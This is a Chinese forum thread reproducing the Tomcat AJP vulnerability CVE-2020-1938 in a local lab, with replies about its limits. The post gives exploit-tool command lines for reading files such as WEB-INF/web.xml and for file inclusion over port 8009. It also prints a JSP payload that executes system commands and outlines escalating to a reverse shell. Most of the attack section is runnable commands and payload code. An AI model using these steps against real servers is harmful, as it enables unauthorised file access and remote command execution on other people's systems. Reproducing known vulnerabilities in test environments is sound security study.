吾爱破解 - LCG - LSG |安卓破解|病毒分析|破解软件|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

搜索
查看: 1901|回复: 15
上一主题 下一主题

[漏洞分析] CVE-2020-1938_Tomcat_文件读取&包含漏洞复现

[复制链接]
跳转到指定楼层
楼主
bakabakaba 发表于 2020-2-29 03:52 回帖奖励
漏洞影响范围包括
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

一、利用工具:
https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
使用方法:
(文件读取)
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1

(文件包含)
python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1

二、环境搭建
http://archive.apache.org/dist/tomcat/ 直接下载官方环境包

三、复现
1、使用文件读取,查看web源代码:
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 127.0.0.1
注意,此时的目录为web根目录


2、如果存在上传功能,上传txt进行包含攻击;(这里由于是测试环境,就复制一个txt文件到根目录假装上传;实际情况的话需要知道上传文件的路径)
这里上传的txt文件为”test.txt“
内容如下:
[Java] 纯文本查看 复制代码
<%
	java.io.InputStream in = Runtime.getRuntime().exec("whoami").getInputStream();
	int a = -1;
	byte[] b = new byte[2048];
	out.print("<pre>");
	while((a=in.read(b))!=-1){
		out.println(new String(b));
	}
	out.print("</pre>");
%>

python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1


3、通过以上操作已经可以读取文件和执行命令了,接着就是反弹shell
反弹shell还是通过执行命令来实现的,具体操作为修改test.txt文件内容,将里边的命令修改为反弹的命令即可,这里需要注意的是,反弹命令需要到这个网站进行转换“http://www.jackson-t.ca/runtime-exec-payloads.html”


免费评分

参与人数 8吾爱币 +8 热心值 +8 收起 理由
thekevinwow + 1 + 1 谢谢@Thanks!
你爷爷的爷爷 + 1 + 1 牛逼
sxlixiaoyang + 2 + 1 优秀!~
蜗巨 + 1 + 1 谢谢@Thanks!
shenRain + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
兔子先生爱破解 + 1 + 1 用心讨论,共获提升!
imwangxm + 1 用心讨论,共获提升!
叁先生 + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
 楼主| bakabakaba 发表于 2020-2-29 03:59 <
上图有个错误,反弹的图片那里,反弹的命令没有进行转换,实际要进行转换才行
推荐
BubblePig 发表于 2020-3-28 16:34
techliu 发表于 2020-2-29 17:26
asdf是什么东西?为啥读取和上传上去都有一个asdf出现呢?

读取用的是asdf,你用其他的字母也行,Servlet中没有即可,他就会走DefaultServlet。如果是文件包含就要用xxx.jsp,就会走JspServlet。
3#
叁先生 发表于 2020-2-29 08:07
我终于看到一次不是复制别人的贴子的复现了,爱你楼主
4#
vsoft 发表于 2020-2-29 10:36
感谢分享,学习一下楼主的源码
5#
 楼主| bakabakaba 发表于 2020-2-29 12:56 <
vsoft 发表于 2020-2-29 10:36
感谢分享,学习一下楼主的源码

源码不是我的,我也是github上找的
6#
admans 发表于 2020-2-29 16:50
感谢分享
7#
techliu 发表于 2020-2-29 17:26
asdf是什么东西?为啥读取和上传上去都有一个asdf出现呢?
8#
whf625933 发表于 2020-2-29 22:12
没想到一个文件读取漏洞可以getshell啊。
9#
就是三七 发表于 2020-3-1 00:09
赞一个! 不过这个漏洞有局限性,getshll的前提得配合有文件上传功能
10#
^^tom^^ 发表于 2020-3-1 01:02
内网中利用一下还不错, 外网开放8009的太少!
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2020-4-8 05:04

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表